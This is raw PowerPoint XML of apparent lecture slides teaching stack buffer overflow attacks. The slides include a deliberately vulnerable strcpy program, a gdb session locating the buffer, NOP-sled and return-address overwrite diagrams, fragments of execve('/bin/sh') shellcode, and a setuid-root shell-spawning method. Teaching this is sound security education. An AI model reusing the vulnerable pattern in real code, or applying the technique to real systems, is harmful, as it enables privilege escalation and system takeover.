              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>caller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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/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Control is transferred to the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>’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When function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-241300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Control is transferred back to the ‘caller’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-3794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Last-called, first-return (LIFO) order naturally implemented via stack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35113" y="3490912"/>
            <a:ext cx="1676400" cy="1735138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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foo(…)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 marL="457200" lvl="1" indent="0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who();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744913" y="4330700"/>
            <a:ext cx="1752600" cy="1735137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99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who(…)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 marL="457200" lvl="1" indent="0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amI();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6030913" y="5245100"/>
            <a:ext cx="1600200" cy="1460500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CCCC"/>
          </a:solidFill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amI(…)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• • •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2982913" y="4559300"/>
            <a:ext cx="762000" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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3195638" y="4219575"/>
            <a:ext cx="473075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call</a:t>
            </a:r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5284788" y="5397500"/>
            <a:ext cx="762000" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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5497513" y="5056187"/>
            <a:ext cx="47307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call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11275" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3019425" y="4675187"/>
            <a:ext cx="685800" cy="1371600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 685800 w 473"/>
              <a:gd name="T1" fmla="*/ 1371600 h 982"/>
              <a:gd name="T2" fmla="*/ 326226 w 473"/>
              <a:gd name="T3" fmla="*/ 1371600 h 982"/>
              <a:gd name="T4" fmla="*/ 326226 w 473"/>
              <a:gd name="T5" fmla="*/ 268174 h 982"/>
              <a:gd name="T6" fmla="*/ 326226 w 473"/>
              <a:gd name="T7" fmla="*/ 0 h 982"/>
              <a:gd name="T8" fmla="*/ 0 w 473"/>
              <a:gd name="T9" fmla="*/ 0 h 9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3"/>
              <a:gd name="T16" fmla="*/ 0 h 982"/>
              <a:gd name="T17" fmla="*/ 473 w 473"/>
              <a:gd name="T18" fmla="*/ 982 h 9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3" h="982">
                <a:moveTo>
                  <a:pt x="473" y="982"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="982"/>
                  <a:pt x="308" y="982"/>
                  <a:pt x="225" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="225" y="192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="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3360738" y="5643562"/>
            <a:ext cx="38417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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11277" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5268913" y="5586412"/>
            <a:ext cx="762000" cy="954088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 762000 w 473"/>
              <a:gd name="T1" fmla="*/ 954088 h 982"/>
              <a:gd name="T2" fmla="*/ 362474 w 473"/>
              <a:gd name="T3" fmla="*/ 954088 h 982"/>
              <a:gd name="T4" fmla="*/ 362474 w 473"/>
              <a:gd name="T5" fmla="*/ 186543 h 982"/>
              <a:gd name="T6" fmla="*/ 362474 w 473"/>
              <a:gd name="T7" fmla="*/ 0 h 982"/>
              <a:gd name="T8" fmla="*/ 0 w 473"/>
              <a:gd name="T9" fmla="*/ 0 h 9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3"/>
              <a:gd name="T16" fmla="*/ 0 h 982"/>
              <a:gd name="T17" fmla="*/ 473 w 473"/>
              <a:gd name="T18" fmla="*/ 982 h 9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3" h="982">
                <a:moveTo>
                  <a:pt x="473" y="982"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="982"/>
                  <a:pt x="308" y="982"/>
                  <a:pt x="225" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="225" y="192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3816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5649913" y="6118225"/>
            <a:ext cx="384175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ret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New diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4003675" y="-939800"/>
            <a:ext cx="1266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2171700" y="3095625"/>
            <a:ext cx="56292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5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000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Buffer Overflow (Injected Data)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81000" y="159067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438775" y="159385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6781800" y="159385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7800975" y="159385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667000" y="838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7" name="Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="320675" y="1282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Buffer Overflow (Idealized)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228600" y="4848225"/>
            <a:ext cx="8629650" cy="1064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Ideally, this is what a buffer overflow attack looks like…</a:t>
            </a:r>
          </a:p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28600" y="5715000"/>
            <a:ext cx="8629650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Problem #1: Where is the return address located? Have only an approximate idea relative to buffer.  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81050" y="28194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304800" y="2973387"/>
            <a:ext cx="632460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715125" y="2974975"/>
            <a:ext cx="1019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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="20" idx="2"/>
            <a:endCxn id="22" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4359276" y="954088"/>
            <a:ext cx="82550" cy="5648325"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 376923"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101520">
            <a:solidFill>
              <a:srgbClr val="003300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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1381125" y="3486150"/>
            <a:ext cx="39052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81000" y="159067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38775" y="159385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6781800" y="159385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7800975" y="159385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667000" y="838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 flipH="1" flipV="1">
            <a:off x="320675" y="1282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5400000">
            <a:off x="4305300" y="-1563687"/>
            <a:ext cx="504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Buffer Overflow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28600" y="4248150"/>
            <a:ext cx="8801100" cy="1433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Solution – Spam the new address we want to overwrite the return address. </a:t>
            </a:r>
          </a:p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So it will overwrite the return address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81000" y="159067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438775" y="159385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>
            <a:off x="6781800" y="159385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7800975" y="159385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667000" y="838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40" name="Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="320675" y="1282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685800" y="2817813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 rot="5400000">
            <a:off x="4305300" y="-1563687"/>
            <a:ext cx="504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285750" y="2971800"/>
            <a:ext cx="56578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6619875" y="2973388"/>
            <a:ext cx="1019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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="44" idx="2"/>
            <a:endCxn id="46" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4264026" y="952501"/>
            <a:ext cx="82550" cy="5648325"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 376923"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101520">
            <a:solidFill>
              <a:srgbClr val="003300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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1285875" y="3484563"/>
            <a:ext cx="39052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5991225" y="2970213"/>
            <a:ext cx="5905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7677150" y="2970213"/>
            <a:ext cx="638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8362950" y="2970213"/>
            <a:ext cx="6286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Buffer Overflow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381000" y="159067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438775" y="159385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228600" y="4248150"/>
            <a:ext cx="8801100" cy="1064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Problem #2: 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Don’t know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where the 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malicious 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code starts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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(Addresses are absolute, not relative)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6781800" y="159385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7800975" y="159385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667000" y="838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19" name="Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="320675" y="1282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85800" y="2817813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5400000">
            <a:off x="4305300" y="-1563687"/>
            <a:ext cx="504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285750" y="2971800"/>
            <a:ext cx="56578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6619875" y="2973388"/>
            <a:ext cx="1019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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4264026" y="952501"/>
            <a:ext cx="82550" cy="5648325"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 376923"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101520">
            <a:solidFill>
              <a:srgbClr val="003300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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1285875" y="3484563"/>
            <a:ext cx="39052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991225" y="2970213"/>
            <a:ext cx="5905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7677150" y="2970213"/>
            <a:ext cx="638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8362950" y="2970213"/>
            <a:ext cx="6286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Insertion address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How to find the insertion address?</a:t>
            </a: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8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int</a:t>
            </a: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 main( char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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argc</a:t>
            </a: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, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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argv</a:t>
            </a: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[] ) {</a:t>
            </a:r>
            <a:b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   char buffer[500];</a:t>
            </a:r>
            <a:b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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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strcpy</a:t>
            </a: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( buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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argv</a:t>
            </a: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[1] );</a:t>
            </a:r>
            <a:b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   return 0;</a:t>
            </a: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8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}</a:t>
            </a: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endParaRPr lang="en-US" altLang="en-US" sz="18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Insertion address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GDB to find the stack pointer or buffer address directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95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en-US" altLang="en-US" sz="1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endParaRPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" pitchFamily="49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endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin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/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$ 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gdb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 sample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(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gdb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) break main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Breakpoint 1 at 0x400581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(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gdb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) run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Starting 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  <a:t>program: sample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  <a:ea typeface="+mn-ea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Breakpoint 1, 0x0000000000400581 in main ()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(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gdb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) p $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rsp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/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$1 = (void *) 0x7fffffffe310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(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gdb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) p &amp;buffer</a:t>
            </a:r>
            <a:b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</a:b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$2 = (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struct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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>utmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> **) 0x7ffff7dd4a38 &lt;buffer&gt;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4419600" y="1828800"/>
            <a:ext cx="4572000" cy="111569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 main( char *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</a:rPr>
              <a:t>argc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, char *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[] ) {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   char buffer[500];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  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</a:rPr>
              <a:t>strcpy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( buffer,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[1] );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   return 0;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Setting return address </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3124199"/>
            <a:ext cx="533400" cy="2590801"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50149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4738326" y="4114800"/>
            <a:ext cx="165331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16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533400" y="1219200"/>
            <a:ext cx="4224338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What happens with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>mis</a:t>
            </a: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-set instruction pointer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?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000066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05400" y="3581400"/>
            <a:ext cx="1289050" cy="334963"/>
            <a:chOff x="3799" y="2264"/>
            <a:chExt cx="812" cy="211"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20491" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4086" y="2376"/>
              <a:ext cx="525" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76320">
              <a:solidFill>
                <a:srgbClr val="0033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3799" y="2264"/>
              <a:ext cx="311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600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000066"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>IP?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029200" y="1447800"/>
            <a:ext cx="1290637" cy="334963"/>
            <a:chOff x="3817" y="908"/>
            <a:chExt cx="813" cy="211"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20489" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4104" y="1020"/>
              <a:ext cx="526" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76320">
              <a:solidFill>
                <a:srgbClr val="0033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Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3817" y="908"/>
              <a:ext cx="311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600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000066"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>IP?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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705600" y="30480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rdi,%rdi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$0x69,%al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,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$0x68732f6e69622fff,%rbx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shr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$0x8,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rax,%rax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rsp,%rsi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$0x3b,%al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$0x1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pop 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$0x3c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pop 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dirty="0" smtClean="0"/>
              <a:t>NOP Sled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705600" y="30480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rdi,%rdi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$0x69,%al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,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$0x68732f6e69622fff,%rbx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shr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$0x8,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rax,%rax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rsp,%rsi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$0x3b,%al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$0x1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pop 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$0x3c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pop    %</a:t>
            </a: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9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endParaRPr lang="en-US" altLang="en-US" sz="9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4718050" cy="2864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NOP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= Assembly instruction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            (No Operation)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Advance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instruction pointer by one, and do nothing else.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Create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a lot of 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them and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target a region that we know precedes shell code….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53000" y="1295400"/>
            <a:ext cx="1290637" cy="334963"/>
            <a:chOff x="3811" y="668"/>
            <a:chExt cx="813" cy="211"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21516" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4098" y="780"/>
              <a:ext cx="526" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76320">
              <a:solidFill>
                <a:srgbClr val="0033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3811" y="668"/>
              <a:ext cx="311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600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000066"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>IP?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962525" y="1676400"/>
            <a:ext cx="1290637" cy="334963"/>
            <a:chOff x="3817" y="908"/>
            <a:chExt cx="813" cy="211"/>
          </a:xfrm>
        </p:grpSpPr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4104" y="1020"/>
              <a:ext cx="526" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76320">
              <a:solidFill>
                <a:srgbClr val="0033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3817" y="908"/>
              <a:ext cx="311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600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000066"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>IP?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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6629400" y="381000"/>
            <a:ext cx="630237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  <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95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en-US" altLang="en-US" sz="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+mn-ea"/>
              </a:rPr>
              <a:t> NOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3124199"/>
            <a:ext cx="533400" cy="2590801"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50149"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="255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738324" y="4114800"/>
            <a:ext cx="165331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16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Buffer Overflow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381000" y="159067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5438775" y="159385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228600" y="4248150"/>
            <a:ext cx="88011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5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</a:rPr>
              <a:t>The anatomy of a real buffer overflow attack </a:t>
            </a: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–</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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6781800" y="159385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7800975" y="159385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19" name="Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="320675" y="1282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667000" y="838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752475" y="2817812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5400000">
            <a:off x="4371975" y="-1563688"/>
            <a:ext cx="504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3400425" y="2971799"/>
            <a:ext cx="26098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Malicious code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686550" y="2973387"/>
            <a:ext cx="1019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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="24" idx="2"/>
            <a:endCxn id="26" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4330701" y="952500"/>
            <a:ext cx="82550" cy="5648325"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 376923"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="101520">
            <a:solidFill>
              <a:srgbClr val="003300"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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1352550" y="3484562"/>
            <a:ext cx="39052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057900" y="2970212"/>
            <a:ext cx="5905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7743825" y="2970212"/>
            <a:ext cx="638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8429625" y="2970212"/>
            <a:ext cx="6286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04800" y="2970212"/>
            <a:ext cx="305752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NOP Sled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Malicious code injection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800" dirty="0" smtClean="0"/>
              <a:t>We have a means for executing our own code</a:t>
            </a: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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>What code should we execute?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How do you typically access a machine remotely?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Code that allows you an interactive shell</a:t>
            </a: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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Is that enough?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Can’t tamper with /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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Code that gets you at the highest privilege level</a:t>
            </a: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sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So, find a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> root program, force it to set its real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> to 0, then execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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Control Flow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17488" eaLnBrk="1" hangingPunct="1"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The hardware provides machine instructions for this:</a:t>
            </a:r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Function call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>label</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty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Push return address on stack (address of next instruction after the call)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Jump to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>label</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-379413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Function return</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="738188" lvl="1" indent="-241300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ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty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Pop return address from stack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Jump to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Spawning root shells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50"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>In C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( 0 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[], *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
